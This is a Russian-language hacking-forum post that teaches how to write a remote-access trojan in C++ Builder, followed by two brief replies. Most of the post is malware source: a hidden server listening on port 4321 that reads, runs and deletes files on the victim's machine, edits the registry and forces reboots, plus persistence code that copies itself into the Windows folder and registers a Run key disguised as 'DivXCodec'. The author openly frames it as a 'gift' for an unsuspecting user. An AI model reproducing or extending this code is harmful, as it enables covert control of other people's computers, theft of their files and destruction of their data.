1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Пишем своего троянчика!

Тема в разделе "Чужие", создана пользователем Gawana, 30 апр 2013.

  1. TopicStarter Overlay
    Gawana

    Gawana

    Регистрация:
    20 апр 2013
    Сообщения:
    31
    Симпатии:
    24
    Сегодня мы будем учиться писать троянчик. Небольшой, но СВОЙ! Почему? Конечно-конечно, троянов в сети навалом, но рано или поздно они вдруг начинают определяться антивирусами, приходиться ждать апдейта... Ожидание - самый скучный повод. Не знаю как вы, но я ждать не люблю, да и использовать чужие трояны это совсем не по хакерски. Короче, пишем свой троян и точка.

    После точки, как учили в школе, пишем с большой буквы... Так вот, о чем я? Писать я буду, как обычно, на своем любимом Builder C++. Если у вас руки растут не оттуда, откуда у меня ноги, то без проблем все переделаете под Дельфи, если припрет конечно...

    Естественно, наш троян будет состоять из 2-х частей =) Серверной (отправляемой как подарок ламерюге) и клиентской (оставим себе на память). Надо сказать, что я давно не юзал никакие трояны, так что не знаю, что там сейчас они умеют делать, может уже и коврик под мышкой научились двигать или корпус компа открывать. Мы же пишем "троянчик", поэтому делать он будет только следующее:
    1) читать, удалять, запускать файлы на удаленном компьютере
    2) работать с реестром на удаленном компьютере
    3) ну и традиционный набор разных бесполезных функций, типа открытие CD-ROM'a, смена клавишей мышки etc.

    Перекурили и поехали!
    Использовать будем стандартные компоненты TClientSocket и TServerSocket.

    Начнем с клиента. Набрасываем простенький интерфейс и приступаем к реализации. Управлять удаленным компьютером будем с помощью специальных команд. Для примера пускай структура их будет такая:
    Nпараметры. N - цифра. Каждому действию присвоен свой код. Т.е. например 1 - перезагрузка, 2 - чтение файла и т.д. Главное чтоб было однозначное соответствие между тем что хотим сделать (команда передаваемая клиентом) и тем что выполняет программа (обработка команды на сервере). С этим разобрались. Теперь параметры. Бывает мало передать только номер команды. Конечно, чтобы перезагрузить компьютер никаких параметров не надо (хотя можно и здесь передать параметры в функцию перезагрузки), но как например реализовать удаление файла не передавая параметра? Мы передаем команду на удаление файла, но какого?! Для этого будем использовать параметры. В качестве параметра в данном случае будет передаваться имя файла. Бывает, что мало передать один параметр. Например надо прочитать n-строчек из file.txt. Здесь необходимо передать 2 параметра. В нашем примере параметры отделяются друг от друга комбинацией "\r\n" - перевод каретки. Объясняется данная структура тем, что в сервере мы сначала помещаем полученную команду в TStringList и потом можем спокойно обращаться к любой строчке этого TStringList'а через свойство Strings, где i-номер строчки, а соответственно и номер параметра. В общем, это вещи достаточно очевидные.

    Вот так, вроде бы только начав писать клиентскую часть мы ее уже почти и закончили! Ведь на самом деле ничего кроме отсылки команд и приема ответов от сервера она делать и не должна. Для приема ответов просто создадим поле TMemo и добавим обработчик события OnRead нашего компонента TClientSocket:
    Код:
    void __fastcall TForm1::TrojControllerRead(TObject *Sender,
          TCustomWinSocket *Socket)
    {
    Memo2->Lines->Add(Socket->ReceiveText());
    }
    Вот и все. Клиент законен! Переходим к серверу...

    Сервер будет чуть пообъемнее. Вначале определимся с задачами:
    1) получение команд
    2) их обработка и выполнение соответствующих действий
    3) отсылка ответа клиенту (должны же мы знать что происходит на сервере)
    Реализуем...

    Во-первых, никакого визуального оформления естественно не будет =) Поэтому на форму поместим только 1 компонент: TServerSocket. Инициализацию его проведем в функции FormCreate(). Хотя можно было бы просто прописать 2 параметра в Object Inspector'е. Но раз уж сделали, так сделали =)

    Код:
    void __fastcall TForm1::FormCreate(TObject *Sender)
    {
    // ServSckt - наш компонент TServerSocket
    ServSckt->Port = 4321;
    ServSckt->Active = true;
    }
    Итак, указали порт, активизировали сокет. Теперь обрабатываем событие ClientRead, т.е. получение данных сокетом. Комментирую на примере:

    Код:
    void __fastcall TForm1::ServScktClientRead(TObject *Sender,
          TCustomWinSocket *Socket)
    {
    RecCommand(Socket->ReceiveText()); // пишем для наглядности функцию обработки поступившей
                                      // информации, которую передаем как параметр этой функции
    }
    //---------------------------------------------------------------------------
    // собственно сама функция: Rec - сокращение от Recognize. Можно по-другому назвать =)
    void TForm1::RecCommand (String received)
    {
    int cn;
    TTrojanUtilites Utilz;  // создаем объект наших утилит
    Utilz.Sock=ServSckt;    // необходимо для отсылки ответа клиенту, так как сокет у нас
                    // находится на форме, а TTrojanUtilites не имеет никакого отношения
                    // к форме. Просто передаем указатель на TServerSocket
    String temp;
    temp=received;
    temp.Delete(2,temp.Length());  // получаем первый символ сообщения - номер команды
    cn = StrToInt(temp);      // преобразуем в число
    received.Delete(1,1);      // удаляем код команды - остаются одни параметры
    switch (cn) {        // в соответсвии с полученой командой
                                    // запускаем соотвествующую утилиту
    case 1 : Utilz.RestartMachine(); break;  // перезагрузка
    case 2 : Utilz.WriteRegistry(received); break;  // запись в реестр
    case 3 : Utilz.ReadRegistry(received); break;  // чтение реестра
    case 4 : Utilz.SendFile(received); break;      // чтение файла
    case 5 : Utilz.DeleteFile(received); break;    // удаление файла
    case 6 : Utilz.ExecuteFile(received); break;    // запуск файла
    case 7 : Utilz.OpenCloseCD; break;            // открытие/закрытие CD-ROM
    case 8 : Utilz.HideMouse(); break;            // прячем курсор мыши
    case 9 : Utilz.SwapMouseButtons(); break;      // переключаем кнопки мыши
    default:
    SendMsgToClient("Неправильная команда!") ; // получена недопустимая команда
                                              // информируем клиента об этом
    }
    }
    Теперь немного подробнее. Мы пишем специальный класс TTrojanUtilites, в котором реализуем все необходимые функции. В RecognizeCommand (String Directive) мы только отделяем команду от параметров и запускаем необходимые методы TTrojanUtilites, передавая по необходимости в них параметры.

    Реализация TTrojanUtilites есть то, чем мы сейчас займемся. Класс оформим в отдельном модуле, не забудьте подключить его.

    Поехали... Во-первых, подключаем #include <MMSystem.hpp> - необходимо для реализации работы с CD-ROM'ом. Далее пишем все необходимые методы.

    Краткие комментарии на примере:

    Код:
    void TTrojanUtilites::OpenCloseCD()
    {
    TMCI_Open_Parms OpenParm;
    TMCI_Generic_Parms  GenParm;
    TMCI_Set_Parms SetParm;
    Cardinal DI;
    OpenParm.dwCallback = 0;
    OpenParm.lpstrDeviceType = "CDAudio";
    mciSendCommand(0, MCI_OPEN, MCI_OPEN_TYPE, Longint(&OpenParm));
    DI = OpenParm.wDeviceID;
    if (!CDROMOPEN)
    {
            mciSendCommand(DI, MCI_SET, MCI_SET_DOOR_OPEN, Longint(&SetParm));
            CDROMOPEN = true; // открыть
    }
    else
    {
            mciSendCommand(DI, MCI_SET, MCI_SET_DOOR_CLOSED, Longint(&SetParm));
            CDROMOPEN = false; // закрыть
    }
    mciSendCommand(DI, MCI_CLOSE, MCI_NOTIFY, Longint(&GenParm));
    Sock->Socket->Connections[0]->SendText("Выполнено открытие/закрытие CD-ROM");
    }
    Перезагрузка:

    Код:
    void TTrojanUtilites::RestartMachine()
    {
    if (ExitWindowsEx(EWX_FORCE,0) || ExitWindowsEx(EWX_REBOOT,0));
            Sock->Socket->Connections[0]->SendText("Перезагрузка успешно выполнена.");
    }
    Вот тут я не отвечаю за все ОСи, перезагрузка-то будет, но хотелось бы сделать ее как после нажатия кнопки RESET, а так будет послано сообщение WM_...ENDSESSION etc. Короче, пробуйте сами. Могу только подкинуть основные направления поиска: смотри функции ExitWindows(), ExitWindowsEx(), InitiateSystemShutdown() и AbortSystemShutdown(). Для особо продвинутых могу предложить вариант написать надежный ребут под определенную ось и чипсет =) Например, мой прошлый комп стабильно резетился (только в Win9x, в NT не работало) следующей вставочкой:

    mov dx,0cf9h
    mov al,2
    out dx,al
    mov al,6
    out dx,al

    Откуда цифры? Читайте доки по чипсету =) Одним словом, универсального метода перезагрузить комп без WM_...ENDSESSION я не знаю. Если вы знаете - напишите пару строк, не в падлу =)

    Код:
    void TTrojanUtilites::SendFile(String F)
    {
    TStringList* TTSL=new (TStringList);
    TStringList* TTSL2=new (TStringList);
    int n, i;
    TTSL->Text = F;
    if (!FileExists(TTSL->Strings[0]))
    {
            Sock->Socket->Connections[0]->SendText("Файл не существует.");
            return;
    }
    TTSL2->LoadFromFile(TTSL->Strings[0]);  // загружаем файл в TStringList
    n = TTSL2->Count;                    // получаем число строк в файле
    if (n > StrToInt(TTSL->Strings[1]))    // если надо прочитать не весь файл
            n = StrToInt(TTSL->Strings[1]); // считываем только необходимое число строк
    for (i=0;iSocket->Connections[0]->SendText(TTSL2->Strings); // передаем строки клиенту
    }


    Вроде тут и объяснять нечего.

    Код:
    void TTrojanUtilites::ReadRegistry(ShortString k)
    {
    TRegistry* reg=new TRegistry;
    String res, ts;
    TStringList* TTSL=new TStringList;
    HKEY k1;
    // параметры передаются в следующем порядке:
    ////  0 - root key 
    ////  1 - key name
    ////  2 - value name
    ////  3 - value
    ////  4 - type of value
    TTSL->Text = k;
    ts = TTSL->Strings[0];  // выбираем RootKey
    if (ts == "HKEY_CLASSES_ROOT")  k1 = HKEY_CLASSES_ROOT;
    if (ts == "HKEY_CURRENT_USER")  k1 = HKEY_CURRENT_USER;
    if (ts == "HKEY_LOCAL_MACHINE")  k1 = HKEY_LOCAL_MACHINE;
    if (ts == "HKEY_USERS")          k1 = HKEY_USERS;
    if (ts == "HKEY_CURRENT_CONFIG") k1 = HKEY_CURRENT_CONFIG;
    reg->RootKey = k1;
    reg->OpenKey(TTSL->Strings[1], true); // открываем раздел
    ts = TTSL->Strings[3]; // читаем значение параметра опредеоенного типа
    if (ts == "Bool")  // двоичный  (REG_BINARY)
            if (reg->ReadBool(TTSL->Strings[2]))
                    res = "true";
            else res = "false";
    if (ts == "Integer")  //  числовой  (REG_DWORD)
            res = IntToStr(reg->ReadInteger(TTSL->Strings[2]));
    if (ts == "String")  // строковый (REG_SZ)
            res = reg->ReadString(TTSL->Strings[2]);
    Sock->Socket->Connections[0]->SendText("Чтение реестра. Значение параметра: "+res);
    // передаем клиенту значение параметра
    }
    Запись в реестр аналогична, только используется метод WriteBool(TTSL->Strings[2], false); для записи булевского значения, WriteInteger(TTSL->Strings[2], StrToInt(TTSL->Strings[4])); - для числового, WriteString(TTSL->Strings[2], TTSL->Strings[4]); - для строкового.

    Для запуска файлов на удаленном компьютере используем следующую функцию:

    Код:
    void TTrojanUtilites::ExecuteFile(String f)
    {
    ShellExecute(GetDesktopWindow, "open", f.c_str(), "", "", SW_SHOWNORMAL);
    Sock->Socket->Connections[0]->SendText("Запущен файл "+f);
    }
    Файл запускается в той программе, с которой ассоциирован запуск данного типа файлов, т.е. вы можете запускать не толкьо exe, com, bat, но и любые другие файлы. Html-файл откроется в Explorer'e, Opere, Netscape или еще в чем-то... Хрен знает чем там ламерюга пользуется... Можете запустить ему мп3-шку Децла послушать или Бритни какой-нить, пусть проблюется =)

    Идем дальше. Парочка бесполезных функций:

    Код:
    void TTrojanUtilites::HideMouse()
    {
    ShowCursor(false);
    Sock->Socket->Connections[0]->SendText("Курсор мыши скрыт");
    }
    No commentz...

    Код:
    void TTrojanUtilites::SwapMouseButtons()
    {
    SwapMouseButton(true);
    Sock->Socket->Connections[0]->SendText("Кнопки мыши переключены");
    Можно сделать переключение кнопок обратно (передайте в SwapMouseButton параметр false), но я бы посоветовал поставить таймер и каждую секунду переключать кнопки туда-сюда, веселее будет =) В падлу сейчас уже добавлять, но вкратце это будет так: добавляем TTimer на форму, устанавливаем необходимый интервал, и в обработчике события OnTimer прописываем вызов функции SwapMouseButton с параметром, противоположным прошлому вызову. Млин, все-таки все расписал =)

    Теперь довольно важная функция:

    Код:
    void TTrojanUtilites::DeleteFile(String f)
    {
    if (!FileExists(f))
    {
            Sock->Socket->Connections[0]->SendText("Файл не существует.");
            return;
    }
    TRegistry* Reg=new TRegistry;
    Reg->RootKey = HKEY_LOCAL_MACHINE;
    Reg->OpenKey("\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true);
    Reg->WriteString("Filez for delete","command.com /c del "+f);
    Reg->CloseKey();
    Sock->Socket->Connections[0]->SendText("Файл "+f+" будет удален после перезагрузки.");
    }
    Данная функция НЕ удаляет файл сразу!!! Это сделано специально, так как файлы могут использоваться системой и их удаление возможно только после перезагрузки, данная функция помечает файл к удалению, а удалиться он только после перезагрузки, которую вы легко можете вызвать. Да, еще маленькое примечание: данная функция удаляет только 1 файл, если вы пометите второй файл к удалению - то будет удален только он. А первый останется нетронутым... Немного измените функцию - и можно будет удалять файлы пачками =) Могу еще добавить немного инфы на случай, если надо будет удалить целый каталог и вы точно знаете что в нем нет открытых файлов. Используйте стандартную API функцию SHFileOperation, установив тип операции wFunc в FO_DELETE. Пример:

    Код:
    int res;
    SHFILEOPSTRUCT fo;
    ZeroMemory(&fo, sizeof(fo));
    fo.hwnd  = hwndOwner;  // хэндл окна-владельца прогресс-диалога
    fo.pFrom  = pszFullPath; //путь
    fo.wFunc  = FO_DELETE;
    fo.fFlags = FOF_NOCONFIRMATION; //не спрашивать подтверждения на удаление
    res = SHFileOperation(&fo);
    Только внимательно все проверьте! Будет обломно если ламерюга "вдруг" увидит надпись "Папка голые тетки не может быть удалена, так как юзер активно смотрит сразу 10 порно-фильмов из нее!". А вообще, если опять удалиться в теорию, то наш главный объект Application имеет несколько полезных событий, наиболее интересное для нас OnException происходит тогда, когда в приложении возникает необработанная исключительная ситуация (деление на ноль, удаление несуществующего файла etc). По умолчанию, обработчик этого события вызывает метод ShowException для отображения окна сообщения с пояснением причины ошибки (оно нам надо?! конечно, НЕТ!). Но, вы можете изменить реакцию на событие onException, переписав его обработчик. Тут ничего трудного нет, просто я не ставил перед собой задачу написать офигенный троян, только подтолкнуть вас к этому =) Кто захочет - допишет все необходимое сам, если что - я подскажу =) Ну вот, вроде бы все функции реализовали. Теперь немного о том, что мы не сделали =) Мы не сделали: загрузку/закачку файла. Это все можно сделать подправив SendFile(). Стандартных функций для пересылки файлов через TClient(Server)Socket я не нашел, но впрочем, это не проблема - просто передавайте файлы фрагментами.

    Теперь нам осталось только разобраться с автозагрузкой трояна. Сделаем следующее:
    1) при запуске файл переписывается в папку, в которой установлены винды.
    2) прописываем запуск нашего файла в реестре.

    Реализуем.

    Код:
    void __fastcall TForm1::FormCreate(TObject *Sender)
    {
    ServSckt->Port = 4321;
    ServSckt->Active = true;
    Utilz.Sock=ServSckt;
    Utilz.CDROMOPEN=false;
     
    String WinDir;
    char WinDir1[144];
    GetWindowsDirectory(WinDir1,144);
    WinDir=WinDir1; // папка с установленными виндами
     
    String data;
    TRegistry *pReg = new TRegistry;
    pReg->RootKey=HKEY_LOCAL_MACHINE;
    pReg->OpenKey("\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
    data=pReg->ReadString("DivXCodec");
    if (data != Application->ExeName) //если нашу программу стерли из
    // автозагрузки (DivXCodec - можете поменять по желанию на любое другое название раздела)
        pReg->WriteString("DivXCodec",WinDir+"\\task16man.exe"); //добавляем ее по новой
     
    if (Application->ExeName!=WinDir+"\\task16man.exe") //если файл запустили 1ый раз
    {
            if (!FileExists(WinDir+"\\task16man.exe"))
            {
            String dest=WinDir+"\\task16man.exe";
            BOOL res=MoveFile(Application->ExeName.c_str(), dest.c_str());
            // переписываем файл к виндам
            ServSckt->Active = false;
            ShellExecute(NULL,NULL,dest.c_str(),NULL,NULL,NULL); //запускаем его
            Application->Terminate(); // это приложение закрываем
            }
            else
            Application->Terminate();
            // я тут не разбирал вариантов типа прога записалась в винды, но ее еще раз
            // запустили и им подобных, додумайте сами =)
    }
    else
    {
    ServSckt->Port = 4321;
    ServSckt->Active = true;
     
    String data;
    TRegistry *pReg = new TRegistry;
    pReg->RootKey=HKEY_LOCAL_MACHINE;
    pReg->OpenKey("\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
    data=pReg->ReadString("DivXCodec");
    if (data != Application->ExeName) // не дай бог стерли!
        pReg->WriteString("DivXCodec",Application->ExeName); // пишем назад
    }
    }
    В принципе - это все. Троян готов! Конечно, он тяжеловат, мало функционален etc, НО все это можно исправить, творите =). Удачи!

    forum.xakepinter.net










     
    • Like Like x 2
    Метки:
  2. Avenger

    Avenger Гость

    Оформи еще, а то читать невозмжно.
     
    • Like Like x 1
  3. swaset

    swaset

    Регистрация:
    18 окт 2012
    Сообщения:
    45
    Симпатии:
    13
    Все такое ООП. Неужели все такие вещи так пишутся?
     

Поделиться этой страницей

Загрузка...